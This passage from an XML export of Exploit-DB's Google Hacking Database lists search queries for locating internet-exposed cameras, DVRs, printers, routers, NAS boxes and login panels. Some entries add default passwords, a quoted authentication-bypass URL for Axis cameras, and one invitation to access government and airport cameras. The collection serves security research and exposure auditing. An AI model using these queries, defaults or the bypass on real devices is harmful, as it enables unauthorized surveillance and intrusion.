<link>https://www.exploit-db.com/ghdb/877</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:Brains, Corp. camera</shortDescription>
<textualDescription>mmEye webcam / cam servermmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in.</textualDescription>
<query>allintitle:Brains, Corp. camera</query>
<querystring>https://www.google.com/search?q=allintitle:Brains,+Corp.+camera</querystring>
<edb></edb>
<date>2005-03-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1387</id>
<link>https://www.exploit-db.com/ghdb/1387</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:Edr1680 remote viewer</shortDescription>
<textualDescription>Everfocus EDR1680. Only returns 2 or 3 results, but submitted for completeness sake.</textualDescription>
<query>allintitle:Edr1680 remote viewer</query>
<querystring>https://www.google.com/search?q=allintitle%3AEdr1680+remote+viewer&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5131</id>
<link>https://www.exploit-db.com/ghdb/5131</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:asdm.jnlp</shortDescription>
<textualDescription>Find Cisco ASDM Appliance:
allinurl:asdm.jnlp
Discovered By: Kevin Randall
</textualDescription>
<query>allinurl:asdm.jnlp</query>
<querystring>https://www.google.com/search?q=allinurl:asdm.jnlp</querystring>
<edb></edb>
<date>2019-02-20</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>4037</id>
<link>https://www.exploit-db.com/ghdb/4037</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:awstats.pl ext:pl</shortDescription>
<textualDescription>A lot of Panels with Statics Advanced. Enjoy.
By Rootkit.</textualDescription>
<query>allinurl:awstats.pl ext:pl</query>
<querystring>https://www.google.com/search?q=allinurl:awstats.pl ext:pl</querystring>
<edb></edb>
<date>2015-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>5018</id>
<link>https://www.exploit-db.com/ghdb/5018</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:control/multiview</shortDescription>
<textualDescription>[*] Dork: allinurl:control/multiview
[i] Con este dork, podemos encontrar camaras CCTV MOBOTIX expuestas online
Drok3r</textualDescription>
<query>allinurl:control/multiview</query>
<querystring>https://www.google.com/search?q=allinurl:control/multiview</querystring>
<edb></edb>
<date>2018-11-08</date>
<author>Drok3r</author>
</entry>
<entry>
<id>5019</id>
<link>https://www.exploit-db.com/ghdb/5019</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:DialogHandler.aspx</shortDescription>
<textualDescription>Sites running Telerik Web UI Dialog Handler
allinurl:DialogHandler.aspx
Discovered By: Kevin Randall
</textualDescription>
<query>allinurl:DialogHandler.aspx</query>
<querystring>https://www.google.com/search?q=allinurl:DialogHandler.aspx</querystring>
<edb></edb>
<date>2018-11-08</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>4043</id>
<link>https://www.exploit-db.com/ghdb/4043</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:foldercontent.html?folder=</shortDescription>
<textualDescription>Devices of NAS Iomega Cloud Services.
Enjoy!!!.
By Rootkit.</textualDescription>
<query>allinurl:foldercontent.html?folder=</query>
<querystring>https://www.google.com/search?q=allinurl:foldercontent.html?folder=</querystring>
<edb></edb>
<date>2015-07-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>837</id>
<link>https://www.exploit-db.com/ghdb/837</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:index.htm?cus?audio</shortDescription>
<textualDescription>This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. Needs ActiveX so works for IE/win only ..</textualDescription>
<query>allinurl:index.htm?cus?audio</query>
<querystring>https://www.google.com/search?q=allinurl%3Aindex.htm%3Fcus%3Faudio</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6194</id>
<link>https://www.exploit-db.com/ghdb/6194</link>
<category>Various Online Devices</category>
<shortDescription>allinurl:top.htm?Currenttime</shortDescription>
<textualDescription># Google Dork: allinurl:top.htm?Currenttime
# Just a few internet D-Link Cameras.
# Date: 2020-05-29
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>allinurl:top.htm?Currenttime</query>
<querystring>https://www.google.com/search?q=allinurl:top.htm?Currenttime</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6742</id>
<link>https://www.exploit-db.com/ghdb/6742</link>
<category>Various Online Devices</category>
<shortDescription>AXIS Camera exploit</shortDescription>
<textualDescription>#Exploit Title : AXIS Camera View (CCTV).
#Google Dork : intitle:&quot;Live View / - AXIS&quot; | inurl:/mjpg/video.mjpg?timestamp
# Exploit Author: RedHackBro
Thanks,
RedHackBro
</textualDescription>
<query>AXIS Camera exploit</query>
<querystring>https://www.google.com/search?q=AXIS Camera exploit</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>RedHackBro</author>
</entry>
<entry>
<id>279</id>
<link>https://www.exploit-db.com/ghdb/279</link>
<category>Various Online Devices</category>
<shortDescription>Axis Network Cameras</shortDescription>
<textualDescription>The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------&quot;It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.&quot; Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------&quot;We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for &quot;admin&quot; is bypassed and an attacker gains direct access to the configuration.</textualDescription>
<query>inurl:indexFrame.shtml Axis</query>
<querystring>https://www.google.com/search?q=inurl%3AindexFrame.shtml+Axis&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>748</id>
<link>https://www.exploit-db.com/ghdb/748</link>
<category>Various Online Devices</category>
<shortDescription>axis storpoint &quot;file view&quot; inurl:/volumes/</shortDescription>
<textualDescription>The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF.</textualDescription>
<query>axis storpoint &quot;file view&quot; inurl:/volumes/</query>
<querystring>https://www.google.com/search?q=axis+storpoint+%22file+view%22+inurl%3A%2Fvolumes%2F</querystring>
<edb></edb>
<date>2004-12-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>791</id>
<link>https://www.exploit-db.com/ghdb/791</link>
<category>Various Online Devices</category>
<shortDescription>Axis Video</shortDescription>
<textualDescription>Some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm.
Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?): site:com inurl:axis video server manuals
Can you say default UID and PW?
What's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).
Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy access to admin profile via click of a button - of course from there you have to provide a UID &amp; PW. But read up on the manuals any you may get lucky.
Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera &amp; server view as well as what &amp; when they record. Just a small seed for a possibly big idea - your ambitions may vary.
Rate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it.</textualDescription>
<query>Axis Video Manual</query>
<querystring>site:com inurl:axis video server manuals</querystring>
<edb></edb>
<date>2004-12-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>550</id>
<link>https://www.exploit-db.com/ghdb/550</link>
<category>Various Online Devices</category>
<shortDescription>camera linksys inurl:main.cgi</shortDescription>
<textualDescription>Another webcam, Linksys style.</textualDescription>
<query>camera linksys inurl:main.cgi</query>
<querystring>https://www.google.com/search?q=camera+linksys+inurl%3Amain.cgi&amp;start=0&amp;start=0</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>519</id>
<link>https://www.exploit-db.com/ghdb/519</link>
<category>Various Online Devices</category>
<shortDescription>Canon ImageReady machines</shortDescription>
<textualDescription>The &quot;large&quot; Canon ImageReady machines with model versions 3300, 5000 &amp; 60000.</textualDescription>
<query>intitle:&quot;remote ui:top page&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22remote+ui%3Atop+page%22</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>386</id>
<link>https://www.exploit-db.com/ghdb/386</link>
<category>Various Online Devices</category>
<shortDescription>Canon Webview netcams</shortDescription>
<textualDescription>Canon has a series of netcams that all use the &quot;WebView LiveScope&quot; software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called &quot;LiveApplet&quot; that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi</textualDescription>
<query>intitle:liveapplet inurl:LvAppl</query>
<querystring>https://www.google.com/search?q=intitle%3Aliveapplet+inurl%3ALvAppl</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1234</id>
<link>https://www.exploit-db.com/ghdb/1234</link>
<category>Various Online Devices</category>
<shortDescription>DCS inurl:&quot;/web/login.asp&quot;</shortDescription>
<textualDescription>Login pages for the DCS-950 Web Camera. Even comes with a built in microphone.</textualDescription>
<query>DCS inurl:&quot;/web/login.asp&quot;</query>
<querystring>https://www.google.com/search?q=DCS+inurl:%22/web/login.asp%22&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1202</id>
<link>https://www.exploit-db.com/ghdb/1202</link>
<category>Various Online Devices</category>
<shortDescription>Display Cameras intitle:&quot;Express6 Live Image&quot;</shortDescription>
<textualDescription>Express6 live video controller.Displays video from &quot;Netlive Cameras&quot; found in this search:http://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=1416Several new cameras found in this search.</textualDescription>
<query>Display Cameras intitle:&quot;Express6 Live Image&quot;</query>
<querystring>https://www.google.com/search?q=%22Display+Cameras%22+intitle:%22Express6+Live+Image%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>954</id>
<link>https://www.exploit-db.com/ghdb/954</link>
<category>Various Online Devices</category>
<shortDescription>ext:dhtml intitle:&amp;quot;document centre|(home)&amp;quot; OR intitle:&amp;quot;xerox&amp;quot;</shortDescription>
<textualDescription>Various Online Devices&gt;Xerox (*Centre)</textualDescription>
<query>ext:dhtml intitle:&quot;document centre|(home)&quot; OR intitle:&quot;xerox&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=ext%3Adhtml+intitle%3A%22document+centre%7C%28home%29%22+OR+intitle%3A%22xerox%22</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4739</id>
<link>https://www.exploit-db.com/ghdb/4739</link>
<category>Various Online Devices</category>
<shortDescription>ext:php + inurl:&quot;ajaxfilemanager.php&quot; + intext:&quot;Current Folder Path&quot;</shortDescription>
<textualDescription>Ajax File Manager
#p1x33l
</textualDescription>
<query>ext:php + inurl:&quot;ajaxfilemanager.php&quot; + intext:&quot;Current Folder Path&quot;</query>
<querystring>https://www.google.com/search?q=ext:php + inurl:&quot;ajaxfilemanager.php&quot; + intext:&quot;Current Folder Path&quot;</querystring>
<edb></edb>
<date>2018-04-03</date>
<author>p1x33l</author>
</entry>
<entry>
<id>812</id>
<link>https://www.exploit-db.com/ghdb/812</link>
<category>Various Online Devices</category>
<shortDescription>filetype:cgi transcoder.cgi</shortDescription>
<textualDescription>Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices.</textualDescription>
<query>filetype:cgi transcoder.cgi</query>
<querystring>https://www.google.com/search?q=filetype:cgi+transcoder.cgi&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-01-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3920</id>
<link>https://www.exploit-db.com/ghdb/3920</link>
<category>Various Online Devices</category>
<shortDescription>filetype:jnlp</shortDescription>
<textualDescription>Java Web Start (Java Network Launch Protocol)
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>filetype:jnlp</query>
<querystring>https://www.google.com/search?q=filetype:jnlp</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5805</id>
<link>https://www.exploit-db.com/ghdb/5805</link>
<category>Various Online Devices</category>
<shortDescription>filetype:psp intitle:&quot;Motorola - FX9500&quot;</shortDescription>
<textualDescription>Exploit Title: RFID reader information unauthenticated
Google dork:filetype:psp intitle:&quot;Motorola - FX9500&quot;
Date:3/17/2020
Exploit author: techjohnny
</textualDescription>
<query>filetype:psp intitle:&quot;Motorola - FX9500&quot;</query>
<querystring>https://www.google.com/search?q=filetype:psp intitle:&quot;Motorola - FX9500&quot;</querystring>
<edb></edb>
<date>2020-03-18</date>
<author>Johnny Tech</author>
</entry>
<entry>
<id>7404</id>
<link>https://www.exploit-db.com/ghdb/7404</link>
<category>Various Online Devices</category>
<shortDescription>Fwd: intitle:&quot;Codian MCU - Home Page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Codian MCU - Home Page&quot;
# Various Online Devices
# Date: 08/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Codian MCU - Home Page&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Codian MCU - Home Page&quot;</querystring>
<edb></edb>
<date>2021-10-08</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7445</id>
<link>https://www.exploit-db.com/ghdb/7445</link>
<category>Various Online Devices</category>
<shortDescription>Fwd: intitle:&quot;Heatmiser Wifi Thermostat&quot; &quot;username&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Heatmiser Wifi Thermostat&quot; &quot;username&quot; -.com
# Various Online Devices
# Date: 14/10/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>Fwd: intitle:&quot;Heatmiser Wifi Thermostat&quot; &quot;username&quot; -.com</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Heatmiser Wifi Thermostat&quot; &quot;username&quot; -.com</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7414</id>
<link>https://www.exploit-db.com/ghdb/7414</link>
<category>Various Online Devices</category>
<shortDescription>Fwd: intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;
# Various Online Devices
# Date:09/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;OS-ZuKon&quot; &quot;SSS Siedle&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7411</id>
<link>https://www.exploit-db.com/ghdb/7411</link>
<category>Various Online Devices</category>
<shortDescription>Fwd: intitle:&quot;SPC4300&quot; &quot;ID&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;SPC4300&quot; &quot;ID&quot;
# Various Online Devices
# Date:08/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;SPC4300&quot; &quot;ID&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;SPC4300&quot; &quot;ID&quot;</querystring>
<edb></edb>
<date>2021-10-11</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>8111</id>
<link>https://www.exploit-db.com/ghdb/8111</link>
<category>Various Online Devices</category>
<shortDescription>Google Dork : intitle:&quot;Toshiba Network Camera&quot;</shortDescription>
<textualDescription># Google Dork: Google Dork : intitle:&quot;Toshiba Network Camera&quot;
# Various Online Devices
# Date:14/03/2023
# Exploit Author: Shilpa Shaji</textualDescription>
<query>Google Dork : intitle:&quot;Toshiba Network Camera&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork : intitle:&quot;Toshiba Network Camera&quot;</querystring>
<edb></edb>
<date>2023-03-14</date>
<author>Shilpa Shaji</author>
</entry>
<entry>
<id>8075</id>
<link>https://www.exploit-db.com/ghdb/8075</link>
<category>Various Online Devices</category>
<shortDescription>Google Dork: Brother Printers Properties Page</shortDescription>
<textualDescription># Google Dork: inurl:main.html intitle:brother
# Various Online Devices
# Date:26/02/2023
# Exploit Author: Bilal KUŞ</textualDescription>
<query>Google Dork: Brother Printers Properties Page</query>
<querystring>https://www.google.com/search?q=Google Dork: Brother Printers Properties Page</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Bilal KUŞ</author>
</entry>
<entry>
<id>8068</id>
<link>https://www.exploit-db.com/ghdb/8068</link>
<category>Various Online Devices</category>
<shortDescription>Google Dork: HP Laserjet Config Network Page</shortDescription>
<textualDescription># Google Dork:HP Laserjet Config Network Page
# Various Online Devices
# Date:21/02/2023
# Exploit Author: Kerim Mert YILDIRIM</textualDescription>
<query>Google Dork: HP Laserjet Config Network Page</query>
<querystring>https://www.google.com/search?q=Google Dork: HP Laserjet Config Network Page</querystring>
<edb></edb>
<date>2023-02-21</date>
<author>Kerim Mert YILDIRIM</author>
</entry>
<entry>
<id>6925</id>
<link>https://www.exploit-db.com/ghdb/6925</link>
<category>Various Online Devices</category>
<shortDescription>Google Dork: intitle:&quot;ZM - Console&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ZM - Console&quot;
# Description: Find ZoneMinder (video surveillance software) list of conencted devices.
# Date: 08/05/2021.
# Exploit Author: Sohaib E.B.
# Category: Pages Containing Console log.
</textualDescription>
<query>Google Dork: intitle:&quot;ZM - Console&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: intitle:&quot;ZM - Console&quot;</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Sohaib E.B.</author>
</entry>
<entry>
<id>6926</id>
<link>https://www.exploit-db.com/ghdb/6926</link>
<category>Various Online Devices</category>
<shortDescription>Google Dork: intitle:&quot;ZM - System Log&quot;</shortDescription>
<textualDescription># Exploit Title: ZoneMinder Unprotected System Log.
# Google Dork: intitle:&quot;ZM - System Log&quot;
# Description: Find ZoneMinder (video surveillance software) System Logs.
# Date: 08/05/2021.
# Exploit Author: Sohaib E.B.
# Category: Pages Containing System Logs.
</textualDescription>
<query>Google Dork: intitle:&quot;ZM - System Log&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: intitle:&quot;ZM - System Log&quot;</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Sohaib E.B.</author>
</entry>
<entry>
<id>8074</id>
<link>https://www.exploit-db.com/ghdb/8074</link>
<category>Various Online Devices</category>
<shortDescription>Google Dork: Xerox Phaser Printer Properties Page</shortDescription>
<textualDescription># Google Dork: intitle:phaser inurl:/frameprop.htm
# Various Online Devices
# Date:22/02/2023
# Exploit Author: Bilal KUŞ</textualDescription>
<query>Google Dork: Xerox Phaser Printer Properties Page</query>
<querystring>https://www.google.com/search?q=Google Dork: Xerox Phaser Printer Properties Page</querystring>
<edb></edb>
<date>2023-02-22</date>
<author>Bilal KUŞ</author>
</entry>
<entry>
<id>5270</id>
<link>https://www.exploit-db.com/ghdb/5270</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot; Welcome to DSL-2730B Web Management&quot;</shortDescription>
<textualDescription>Google Dork: intext:&quot; Welcome to DSL-2730B Web Management&quot;
Dlink DSL-2730B Web Management
</textualDescription>
<query>intext:&quot; Welcome to DSL-2730B Web Management&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot; Welcome to DSL-2730B Web Management&quot;</querystring>
<edb></edb>
<date>2019-07-01</date>
<author>Hack Tube</author>
</entry>
<entry>
<id>7099</id>
<link>https://www.exploit-db.com/ghdb/7099</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;2009 PLANET Technology Corporation&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;2009 PLANET Technology Corporation&quot;
# Category: Various Online Devices
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intext:&quot;2009 PLANET Technology Corporation&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;2009 PLANET Technology Corporation&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7236</id>
<link>https://www.exploit-db.com/ghdb/7236</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;</shortDescription>
<textualDescription>#Google Dork: intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;
# Various Online Devices
# Date: 25/06/2021
# Exploit Author: Neha Singh</textualDescription>
<query>intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>7273</id>
<link>https://www.exploit-db.com/ghdb/7273</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;amcrest&quot; &quot;LDAP User&quot;</shortDescription>
<textualDescription>#Google Dork: intext:&quot;amcrest&quot; &quot;LDAP User&quot;
# Various Online Devices
# Date: 26/06/2021
#Exploit Author: Neha Singh
</textualDescription>
<query>intext:&quot;amcrest&quot; &quot;LDAP User&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;amcrest&quot; &quot;LDAP User&quot;</querystring>
<edb></edb>
<date>2021-09-21</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>5087</id>
<link>https://www.exploit-db.com/ghdb/5087</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Any time &amp; Any where&quot; AND &quot;Customer Login&quot;</shortDescription>
<textualDescription>Dork about Avtech - Video Surveillance Technology
Several login panels
intext:&quot;Any time &amp; Any where&quot; AND &quot;Customer Login&quot;
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intext:&quot;Any time &amp; Any where&quot; AND &quot;Customer Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Any time &amp; Any where&quot; AND &quot;Customer Login&quot;</querystring>
<edb></edb>
<date>2019-02-05</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>4937</id>
<link>https://www.exploit-db.com/ghdb/4937</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Build dashboard&quot; intext:&quot;Project&quot; intext:&quot;Plan&quot; intext:&quot;Build&quot;</shortDescription>
<textualDescription>Detail: Can be used to find public facing build servers such as Bamboo
Google Dork: intext:&quot;Build dashboard&quot; intext:&quot;Project&quot; intext:&quot;Plan&quot; intext:&quot;Build&quot;
Date: 9-1-2018
Exploit Author: hehnope</textualDescription>
<query>intext:&quot;Build dashboard&quot; intext:&quot;Project&quot; intext:&quot;Plan&quot; intext:&quot;Build&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Build dashboard&quot; intext:&quot;Project&quot; intext:&quot;Plan&quot; intext:&quot;Build&quot;</querystring>
<edb></edb>
<date>2018-09-04</date>
<author>hehnope</author>
</entry>
<entry>
<id>6708</id>
<link>https://www.exploit-db.com/ghdb/6708</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Connection&quot; AND &quot;Network name&quot; AND &quot; Cisco Meraki cloud&quot; AND &quot;Security Appliance details&quot;</shortDescription>
<textualDescription>Dorks: intext:&quot;Connection&quot; AND &quot;Network name&quot; AND &quot; Cisco Meraki cloud&quot; AND &quot;Security Appliance details&quot;
Category: Various Online Devices
Summary:
A Google dork that gives the Cisco Meraki Firewall information.
</textualDescription>
<query>intext:&quot;Connection&quot; AND &quot;Network name&quot; AND &quot; Cisco Meraki cloud&quot; AND &quot;Security Appliance details&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Connection&quot; AND &quot;Network name&quot; AND &quot; Cisco Meraki cloud&quot; AND &quot;Security Appliance details&quot;</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>4856</id>
<link>https://www.exploit-db.com/ghdb/4856</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;default values: admin/1234&quot;</shortDescription>
<textualDescription>intext:&quot;default values: admin/1234&quot;
default password of WATTrouter M - System Web Interface
ManhNho
</textualDescription>
<query>intext:&quot;default values: admin/1234&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;default values: admin/1234&quot;</querystring>
<edb></edb>
<date>2018-06-14</date>
<author>ManhNho</author>
</entry>
<entry>
<id>6442</id>
<link>https://www.exploit-db.com/ghdb/6442</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Device Name&quot; | intext:&quot;Host Name&quot; inurl:mainFrame.cgi</shortDescription>
<textualDescription># Google Dork: intext:&quot;Device Name&quot; | intext:&quot;Host Name&quot; inurl:mainFrame.cgi
# Various online devices.
# Date: 24/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Device Name&quot; | intext:&quot;Host Name&quot; inurl:mainFrame.cgi</query>
<querystring>https://www.google.com/search?q=intext:&quot;Device Name&quot; | intext:&quot;Host Name&quot; inurl:mainFrame.cgi</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7032</id>
<link>https://www.exploit-db.com/ghdb/7032</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Egardia &amp; WoonVeilig&quot; -site:&quot;linkedin.*&quot; -&quot;data-lead.com&quot; -&quot;getemail.io&quot; -&quot;holaconnect.com&quot; -&quot;kzhead.info&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Egardia &amp; WoonVeilig&quot; -site:&quot;linkedin.*&quot; -&quot;data-lead.com&quot; -&quot;getemail.io&quot; -&quot;holaconnect.com&quot; -&quot;kzhead.info&quot;
# Various online devices
# Date: 21/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intext:&quot;Egardia &amp; WoonVeilig&quot; -site:&quot;linkedin.*&quot; -&quot;data-lead.com&quot; -&quot;getemail.io&quot; -&quot;holaconnect.com&quot; -&quot;kzhead.info&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Egardia &amp; WoonVeilig&quot; -site:&quot;linkedin.*&quot; -&quot;data-lead.com&quot; -&quot;getemail.io&quot; -&quot;holaconnect.com&quot; -&quot;kzhead.info&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>5836</id>
<link>https://www.exploit-db.com/ghdb/5836</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;EWS Data Collection and Use&quot;</shortDescription>
<textualDescription>Category: Various Online Devices
Nicholas Doropoulos
</textualDescription>
<query>intext:&quot;EWS Data Collection and Use&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;EWS Data Collection and Use&quot;</querystring>
<edb></edb>
<date>2020-03-27</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>6440</id>
<link>https://www.exploit-db.com/ghdb/6440</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Frame rate&quot; inurl:/home/homej.html</shortDescription>
<textualDescription># Google Dork: intext:&quot;Frame rate&quot; inurl:/home/homej.html
# Various online devices.
# Date: 24/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Frame rate&quot; inurl:/home/homej.html</query>
<querystring>https://www.google.com/search?q=intext:&quot;Frame rate&quot; inurl:/home/homej.html</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3950</id>
<link>https://www.exploit-db.com/ghdb/3950</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Hikvision&quot; inurl:&quot;login.asp&quot;</shortDescription>
<textualDescription>Hikvision IP Camera login page</textualDescription>
<query>intext:&quot;Hikvision&quot; inurl:&quot;login.asp&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Hikvision&quot; inurl:&quot;login.asp&quot;</querystring>
<edb></edb>
<date>2014-05-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4753</id>
<link>https://www.exploit-db.com/ghdb/4753</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;https://chat.whatsapp.com/invite/&quot; intitle:&quot;Your Search For Company/Subject/Whatever&quot;</shortDescription>
<textualDescription># Exploit Title: WhatsApp Group / Easy Point to information gathering and Social Engineering
# Google Dork: intext:&quot;https://chat.whatsapp.com/invite/&quot; intitle:&quot;Your Search For Company/Subject/Whatever&quot;
